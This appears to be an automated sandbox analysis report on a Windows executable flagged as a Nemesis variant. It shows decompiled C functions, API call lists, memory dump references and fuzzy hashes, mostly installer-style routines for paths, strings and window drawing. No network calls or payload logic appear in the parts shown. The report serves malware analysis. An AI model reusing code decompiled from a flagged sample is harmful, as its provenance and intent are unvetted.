                                                  • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061C7
                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                    • Part of subcall function 00405F92: lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                  • GetShortPathNameW.KERNEL32(?,00431108,00000400), ref: 004061E4
                                                  • wsprintfA.USER32 ref: 00406202
                                                  • GetFileSize.KERNEL32(00000000,00000000,00431108,C0000000,00000004,00431108,?,?,?,?,?), ref: 0040623D
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040624C
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406284
                                                  • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,00430508,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DA
                                                  • GlobalFree.KERNEL32(00000000), ref: 004062EB
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F2
                                                    • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.7222.26141.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                    • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]
                                                  • API String ID: 2171350718-461813615
                                                  • Opcode ID: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                  • Instruction ID: 71978d88b6039f89b25a0dfa2ffa892efa56fbf884cfe692307f7793e751c739
                                                  • Opcode Fuzzy Hash: 6203cc16da91056e546519e3ab518561ff1c14b2742299aa71b9d8e7299f7fea
                                                  • Instruction Fuzzy Hash: 6A314670200716BBD2207B659D48F6B3A6CEF45754F15017EFA42F62C2EA3CA821867D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E0040657A(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                  				struct _ITEMIDLIST* _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _t44;
                                                  				WCHAR* _t45;
                                                  				signed char _t47;
                                                  				signed int _t48;
                                                  				short _t59;
                                                  				short _t61;
                                                  				short _t63;
                                                  				void* _t71;
                                                  				signed int _t77;
                                                  				signed int _t78;
                                                  				short _t81;
                                                  				short _t82;
                                                  				signed char _t84;
                                                  				signed int _t85;
                                                  				intOrPtr _t93;
                                                  				void* _t98;
                                                  				void* _t104;
                                                  				intOrPtr* _t105;
                                                  				void* _t107;
                                                  				WCHAR* _t108;
                                                  				void* _t110;
                                                  
                                                  				_t107 = __esi;
                                                  				_t104 = __edi;
                                                  				_t71 = __ebx;
                                                  				_t44 = _a8;
                                                  				if(_t44 < 0) {
                                                  					_t93 =  *0x433edc; // 0x874466
                                                  					_t44 =  *(_t93 - 4 + _t44 * 4);
                                                  				}
                                                  				_push(_t71);
                                                  				_push(_t107);
                                                  				_push(_t104);
                                                  				_t105 =  *0x434f38 + _t44 * 2;
                                                  				_t45 = 0x432ea0;
                                                  				_t108 = 0x432ea0;
                                                  				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                                                  					_t108 = _a4;
                                                  					_a4 = _a4 & 0x00000000;
                                                  				}
                                                  				_t81 =  *_t105;
                                                  				_a8 = _t81;
                                                  				if(_t81 == 0) {
                                                  					L43:
                                                  					 *_t108 =  *_t108 & 0x00000000;
                                                  					if(_a4 == 0) {
                                                  						return _t45;
                                                  					}
                                                  					return E0040653D(_a4, _t45);
                                                  				} else {
                                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                  						_t98 = 2;
                                                  						_t105 = _t105 + _t98;
                                                  						if(_t81 >= 4) {
                                                  							if(__eflags != 0) {
                                                  								 *_t108 = _t81;
                                                  								_t108 = _t108 + _t98;
                                                  								__eflags = _t108;
                                                  							} else {
                                                  								 *_t108 =  *_t105;
                                                  								_t108 = _t108 + _t98;
                                                  								_t105 = _t105 + _t98;
                                                  							}
                                                  							L42:
                                                  							_t82 =  *_t105;
                                                  							_a8 = _t82;
                                                  							if(_t82 != 0) {
                                                  								_t81 = _a8;
                                                  								continue;
                                                  							}
                                                  							goto L43;
                                                  						}
                                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                  						_t47 =  *_t105;
                                                  						_t48 = _t47 & 0x000000ff;
                                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                  						_t85 = _t84 & 0x000000ff;
                                                  						_v28 = _t48 | 0x00008000;
                                                  						_t77 = 2;
                                                  						_v16 = _t85;
                                                  						_t105 = _t105 + _t77;
                                                  						_v24 = _t48;
                                                  						_v20 = _t85 | 0x00008000;
                                                  						if(_a8 != _t77) {
                                                  							__eflags = _a8 - 3;
                                                  							if(_a8 != 3) {
                                                  								__eflags = _a8 - 1;
                                                  								if(__eflags == 0) {
                                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                                  									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                  								}
                                                  								L38:
                                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                  								_t45 = 0x432ea0;
                                                  								goto L42;
                                                  							}
                                                  							_t78 = _v12;
                                                  							__eflags = _t78 - 0x1d;
                                                  							if(_t78 != 0x1d) {
                                                  								__eflags = (_t78 << 0xb) + 0x436000;
                                                  								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                                                  							} else {
                                                  								E00406484(_t108,  *0x434f08);
                                                  							}
                                                  							__eflags = _t78 + 0xffffffeb - 7;
                                                  							if(__eflags < 0) {
                                                  								L29:
                                                  								E004067C4(_t108);
                                                  							}
                                                  							goto L38;
                                                  						}
                                                  						if( *0x434f84 != 0) {
                                                  							_t77 = 4;
                                                  						}
                                                  						_t121 = _t48;
                                                  						if(_t48 >= 0) {
                                                  							__eflags = _t48 - 0x25;
                                                  							if(_t48 != 0x25) {
                                                  								__eflags = _t48 - 0x24;
                                                  								if(_t48 == 0x24) {
                                                  									GetWindowsDirectoryW(_t108, 0x400);
                                                  									_t77 = 0;
                                                  								}
                                                  								while(1) {
                                                  									__eflags = _t77;
                                                  									if(_t77 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									_t59 =  *0x434f04;
                                                  									_t77 = _t77 - 1;
                                                  									__eflags = _t59;
                                                  									if(_t59 == 0) {
                                                  										L22:
                                                  										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                  										__eflags = _t61;
                                                  										if(_t61 != 0) {
                                                  											L24:
                                                  											 *_t108 =  *_t108 & 0x00000000;
                                                  											__eflags =  *_t108;
                                                  											continue;
                                                  										}
                                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                  										_a8 = _t61;
                                                  										__imp__CoTaskMemFree(_v8);
                                                  										__eflags = _a8;
                                                  										if(_a8 != 0) {
                                                  											goto L26;
                                                  										}
                                                  										goto L24;
                                                  									}
                                                  									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                  									__eflags = _t63;
                                                  									if(_t63 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									goto L22;
                                                  								}
                                                  								goto L26;
                                                  							}
                                                  							GetSystemDirectoryW(_t108, 0x400);
                                                  							goto L26;
                                                  						} else {
                                                  							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                  							if( *_t108 != 0) {
                                                  								L27:
                                                  								if(_v16 == 0x1a) {
                                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							E0040657A(_t77, _t105, _t108, _t108, _v16);
                                                  							L26:
                                                  							if( *_t108 == 0) {
                                                  								goto L29;
                                                  							}
                                                  							goto L27;
                                                  						}
                                                  					}
                                                  					goto L43;
                                                  				}
                                                  			}






























                                                  0x0040657a
                                                  0x0040657a
                                                  0x0040657a
                                                  0x00406580
                                                  0x00406585
                                                  0x00406587
                                                  0x00406596
                                                  0x00406596
                                                  0x0040659e
                                                  0x0040659f
                                                  0x004065a0
                                                  0x004065a1
                                                  0x004065a4
                                                  0x004065ac
                                                  0x004065ae
                                                  0x004065bf
                                                  0x004065c2
                                                  0x004065c2
                                                  0x004065c6
                                                  0x004065cc
                                                  0x004065cf
                                                  0x004067aa
                                                  0x004067aa
                                                  0x004067b5
                                                  0x004067c1
                                                  0x004067c1
                                                  0x00000000
                                                  0x004065d5
                                                  0x004065da
                                                  0x004065ef
                                                  0x004065f0
                                                  0x004065f6
                                                  0x00406788
                                                  0x00406796
                                                  0x00406799
                                                  0x00406799
                                                  0x0040678a
                                                  0x0040678d
                                                  0x00406790
                                                  0x00406792
                                                  0x00406792
                                                  0x0040679b
                                                  0x0040679b
                                                  0x004067a1
                                                  0x004067a4
                                                  0x004065d7
                                                  0x00000000
                                                  0x004065d7
                                                  0x00000000
                                                  0x004067a4
                                                  0x004065fc
                                                  0x004065ff
                                                  0x0040660e
                                                  0x00406615
                                                  0x00406621
                                                  0x00406624
                                                  0x00406627
                                                  0x00406628
                                                  0x0040662d
                                                  0x00406633
                                                  0x00406636
                                                  0x00406639
                                                  0x0040672c
                                                  0x00406731
                                                  0x00406764
                                                  0x00406769
                                                  0x0040676e
                                                  0x00406773
                                                  0x00406773
                                                  0x00406778
                                                  0x0040677e
                                                  0x00406781
                                                  0x00000000
                                                  0x00406781
                                                  0x00406733
                                                  0x00406736
                                                  0x00406739
                                                  0x0040674e
                                                  0x00406755
                                                  0x0040673b
                                                  0x00406742
                                                  0x00406742
                                                  0x0040675d
                                                  0x00406760
                                                  0x00406724
                                                  0x00406725
                                                  0x00406725
                                                  0x00000000
                                                  0x00406760
                                                  0x00406646
                                                  0x0040664a
                                                  0x0040664a
                                                  0x0040664b
                                                  0x0040664d
                                                  0x0040668a
                                                  0x0040668d
                                                  0x0040669d
                                                  0x004066a0
                                                  0x004066a8
                                                  0x004066ae
                                                  0x004066ae
                                                  0x00406709
                                                  0x00406709
                                                  0x0040670b
                                                  0x00000000
                                                  0x00000000
                                                  0x004066b2
                                                  0x004066b7
                                                  0x004066b8
                                                  0x004066ba
                                                  0x004066d1
                                                  0x004066df
                                                  0x004066e5
                                                  0x004066e7
                                                  0x00406705
                                                  0x00406705
                                                  0x00406705
                                                  0x00000000
                                                  0x00406705
                                                  0x004066ed
                                                  0x004066f6
                                                  0x004066f9
                                                  0x004066ff
                                                  0x00406703
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406703
                                                  0x004066cb
                                                  0x004066cd
                                                  0x004066cf
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004066cf
                                                  0x00000000
                                                  0x00406709
                                                  0x00406695
                                                  0x00000000
                                                  0x0040664f
                                                  0x0040666d
                                                  0x00406676
                                                  0x00406713
                                                  0x00406717
                                                  0x0040671f
                                                  0x0040671f
                                                  0x00000000
                                                  0x00406717
                                                  0x00406680
                                                  0x0040670d
                                                  0x00406711
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00406711
                                                  0x0040664d
                                                  0x00000000
                                                  0x004065da

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406695
                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000,00000000,?,755323A0), ref: 004066A8
                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll,00000000), ref: 00406779
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsy8A61.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4260037668-2341343530
                                                  • Opcode ID: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                  • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                                                  • Opcode Fuzzy Hash: 0b784a7e5946d1979f34278c46bba3f41134a9dae7c042527df4b3408295a3c8
                                                  • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404500(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				long _t39;
                                                  				long _t41;
                                                  				void* _t44;
                                                  				signed char _t50;
                                                  				long* _t54;
                                                  
                                                  				if(_a4 + 0xfffffecd > 5) {
                                                  					L18:
                                                  					return 0;
                                                  				}
                                                  				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                  				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                  					goto L18;
                                                  				} else {
                                                  					_t50 = _t54[5];
                                                  					if((_t50 & 0xffffffe0) != 0) {
                                                  						goto L18;
                                                  					}
                                                  					_t39 =  *_t54;
                                                  					if((_t50 & 0x00000002) != 0) {
                                                  						_t39 = GetSysColor(_t39);
                                                  					}
                                                  					if((_t54[5] & 0x00000001) != 0) {
                                                  						SetTextColor(_a8, _t39);
                                                  					}
                                                  					SetBkMode(_a8, _t54[4]);
                                                  					_t41 = _t54[1];
                                                  					_v16.lbColor = _t41;
                                                  					if((_t54[5] & 0x00000008) != 0) {
                                                  						_t41 = GetSysColor(_t41);
                                                  						_v16.lbColor = _t41;
                                                  					}
                                                  					if((_t54[5] & 0x00000004) != 0) {
                                                  						SetBkColor(_a8, _t41);
                                                  					}
                                                  					if((_t54[5] & 0x00000010) != 0) {
                                                  						_v16.lbStyle = _t54[2];
                                                  						_t44 = _t54[3];
                                                  						if(_t44 != 0) {
                                                  							DeleteObject(_t44);
                                                  						}
                                                  						_t54[3] = CreateBrushIndirect( &_v16);
                                                  					}
                                                  					return _t54[3];
                                                  				}
                                                  			}









                                                  0x00404512
                                                  0x004045c8
                                                  0x00000000
                                                  0x004045c8
                                                  0x00404523
                                                  0x00404527
                                                  0x00000000
                                                  0x00404541
                                                  0x00404541
                                                  0x0040454a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040454c
                                                  0x00404558
                                                  0x0040455b
                                                  0x0040455b
                                                  0x00404561
                                                  0x00404567
                                                  0x00404567
                                                  0x00404573
                                                  0x00404579
                                                  0x00404580
                                                  0x00404583
                                                  0x00404586
                                                  0x00404588
                                                  0x00404588
                                                  0x00404590
                                                  0x00404596
                                                  0x00404596
                                                  0x004045a0
                                                  0x004045a5
                                                  0x004045a8
                                                  0x004045ad
                                                  0x004045b0
                                                  0x004045b0
                                                  0x004045c0
                                                  0x004045c0
                                                  0x00000000
                                                  0x004045c3

                                                  APIs
                                                  • GetWindowLongW.USER32(?,000000EB), ref: 0040451D
                                                  • GetSysColor.USER32(00000000), ref: 0040455B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00404567
                                                  • SetBkMode.GDI32(?,?), ref: 00404573
                                                  • GetSysColor.USER32(?), ref: 00404586
                                                  • SetBkColor.GDI32(?,?), ref: 00404596
                                                  • DeleteObject.GDI32(?), ref: 004045B0
                                                  • CreateBrushIndirect.GDI32(?), ref: 004045BA
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                  • String ID:
                                                  • API String ID: 2320649405-0
                                                  • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction ID: 19446832cb8519ea1938040ed984131457e28e93d0b00b9b4dc42373f0e33a15
                                                  • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                  • Instruction Fuzzy Hash: 382177B1500705AFCB31DF68DD08B5BBBF8AF41714B058A2EEA96B22E1C734E944CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 91%
                                                  			E004067C4(WCHAR* _a4) {
                                                  				short _t5;
                                                  				short _t7;
                                                  				WCHAR* _t19;
                                                  				WCHAR* _t20;
                                                  				WCHAR* _t21;
                                                  
                                                  				_t20 = _a4;
                                                  				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                  					_t20 =  &(_t20[4]);
                                                  				}
                                                  				if( *_t20 != 0 && E00405E83(_t20) != 0) {
                                                  					_t20 =  &(_t20[2]);
                                                  				}
                                                  				_t5 =  *_t20;
                                                  				_t21 = _t20;
                                                  				_t19 = _t20;
                                                  				if(_t5 != 0) {
                                                  					do {
                                                  						if(_t5 > 0x1f &&  *((short*)(E00405E39(L"*?|<>/\":", _t5))) == 0) {
                                                  							E00405FE8(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                  							_t19 = CharNextW(_t19);
                                                  						}
                                                  						_t20 = CharNextW(_t20);
                                                  						_t5 =  *_t20;
                                                  					} while (_t5 != 0);
                                                  				}
                                                  				 *_t19 =  *_t19 & 0x00000000;
                                                  				while(1) {
                                                  					_push(_t19);
                                                  					_push(_t21);
                                                  					_t19 = CharPrevW();
                                                  					_t7 =  *_t19;
                                                  					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                  						break;
                                                  					}
                                                  					 *_t19 =  *_t19 & 0x00000000;
                                                  					if(_t21 < _t19) {
                                                  						continue;
                                                  					}
                                                  					break;
                                                  				}
                                                  				return _t7;
                                                  			}








                                                  0x004067c6
                                                  0x004067cf
                                                  0x004067e6
                                                  0x004067e6
                                                  0x004067ed
                                                  0x004067f9
                                                  0x004067f9
                                                  0x004067fc
                                                  0x004067ff
                                                  0x00406804
                                                  0x00406806
                                                  0x0040680f
                                                  0x00406813
                                                  0x00406830
                                                  0x00406838
                                                  0x00406838
                                                  0x0040683d
                                                  0x0040683f
                                                  0x00406842
                                                  0x00406847
                                                  0x00406848
                                                  0x0040684c
                                                  0x0040684c
                                                  0x0040684d
                                                  0x00406854
                                                  0x00406856
                                                  0x0040685d
                                                  0x00000000
                                                  0x00000000
                                                  0x00406865
                                                  0x0040686b
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040686b
                                                  0x00406870

                                                  APIs
                                                  • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                                                  • CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                                                  • CharNextW.USER32(?,00000000,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                                                  • CharPrevW.USER32(?,?,75533420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Char$Next$Prev
                                                  • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                  • API String ID: 589700163-2977677972
                                                  • Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                  • Instruction ID: 8e05d213a2b26a47bd0c986db1e6a85e10b5e067f284fb5e9645f7af11a9ce3c
                                                  • Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
                                                  • Instruction Fuzzy Hash: 7311862780161295DB313B158C44A77A2A8AF58798F56843FED86B32C1E77C8C9282AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00404E54(struct HWND__* _a4, intOrPtr _a8) {
                                                  				long _v8;
                                                  				signed char _v12;
                                                  				unsigned int _v16;
                                                  				void* _v20;
                                                  				intOrPtr _v24;
                                                  				long _v56;
                                                  				void* _v60;
                                                  				long _t15;
                                                  				unsigned int _t19;
                                                  				signed int _t25;
                                                  				struct HWND__* _t28;
                                                  
                                                  				_t28 = _a4;
                                                  				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
                                                  				if(_a8 == 0) {
                                                  					L4:
                                                  					_v56 = _t15;
                                                  					_v60 = 4;
                                                  					SendMessageW(_t28, 0x113e, 0,  &_v60);
                                                  					return _v24;
                                                  				}
                                                  				_t19 = GetMessagePos();
                                                  				_v16 = _t19 >> 0x10;
                                                  				_v20 = _t19;
                                                  				ScreenToClient(_t28,  &_v20);
                                                  				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
                                                  				if((_v12 & 0x00000066) != 0) {
                                                  					_t15 = _v8;
                                                  					goto L4;
                                                  				}
                                                  				return _t25 | 0xffffffff;
                                                  			}














                                                  0x00404e62
                                                  0x00404e6f
                                                  0x00404e75
                                                  0x00404eb3
                                                  0x00404eb3
                                                  0x00404ec2
                                                  0x00404ec9
                                                  0x00000000
                                                  0x00404ecb
                                                  0x00404e77
                                                  0x00404e86
                                                  0x00404e8e
                                                  0x00404e91
                                                  0x00404ea3
                                                  0x00404ea9
                                                  0x00404eb0
                                                  0x00000000
                                                  0x00404eb0
                                                  0x00000000

                                                  APIs
                                                  • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E6F
                                                  • GetMessagePos.USER32 ref: 00404E77
                                                  • ScreenToClient.USER32(?,?), ref: 00404E91
                                                  • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404EA3
                                                  • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EC9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Message$Send$ClientScreen
                                                  • String ID: f
                                                  • API String ID: 41195575-1993550816
                                                  • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction ID: 177f1d0b32132a6560496663958852c5fe6f1b23f9da62007dee57caca3d7f28
                                                  • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                  • Instruction Fuzzy Hash: 34014C71900219BADB00DBA4DD85BFFBBB8AB54711F10012BBA50B61C0D7B49A058BA5
